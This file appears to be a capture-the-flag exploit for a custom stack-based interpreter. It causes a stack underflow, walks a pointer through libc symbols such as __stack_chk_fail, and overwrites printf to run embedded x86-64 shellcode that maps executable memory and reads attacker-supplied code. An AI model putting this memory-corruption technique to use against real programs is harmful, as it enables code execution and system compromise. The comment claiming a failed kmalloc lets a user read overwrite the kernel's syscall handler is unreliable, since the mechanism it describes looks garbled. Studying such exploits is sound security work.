exp3.asm

# Stack = 0x2020A0
# 

0 # padding
ASM
  mov edi, 1 
  lea rsi, [rip + prompt]
  mov edx, promptend - prompt
  mov eax, 1 # Write
  syscall

  mov ecx, eax
  cmp ecx, 0
  jl exit

  # Mmap a chunk of memory that will "just fit" in the allocator.
  mov edi, 0  # addr
  mov esi, 0x1400000 # len
  mov edx, 7  # prot
  mov ecx, 0  # flags
  mov r8d, -1 # fd
  mov r9d, 0  # seek
  mov eax, 9
  syscall

  mov edi, eax
  cmp eax, -0xfff
  jae exit

  # Issue a read syscall. When kernel tries to allocate this temp buffer,
  # kmalloc will fail and return 0x00000000 (or the kernel base) instead,
  # causing a kernel overwrite!
  mov edi, 0
  mov rsi, rax
  mov edx, 0x1000000 # len
  mov eax, 0 # Read
  syscall

  mov edi, eax
  cmp eax, 0
  jl exit

  # Our overwrite will modify the syscall handler. So trigger bug
  syscall

  # This never gets reached.
  hlt


prompt:
  .string "Please enter code to override kernel with:"
promptend:
exit:
  mov eax, 60 # exit
  syscall
ENDASM  
pop

# Okay cause stack underflow
1
neg
swap # cause a stack underflow, and swap with stack ptr
pop
pop

# Store the pointer to stdin
#writed
#writed
0
store
1
store

# Note that stdin is now clobbered!
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
pop
# Now our pointer is at __ctype_b_loc
pop
pop
pop
pop
pop
pop
pop
pop
# Pointer is at __stack_chk_fail with offset 0x7b6
2 # HI
store
3 # LO
store

# Calculate stack: LO + 0x2020a8 - 0x7b6
3
fetch
2103538
add
3
store

# Move pointer to printf
0
0
0
0
# Override printf
3
2
fetch
pop
fetch
writed

#writed
#writed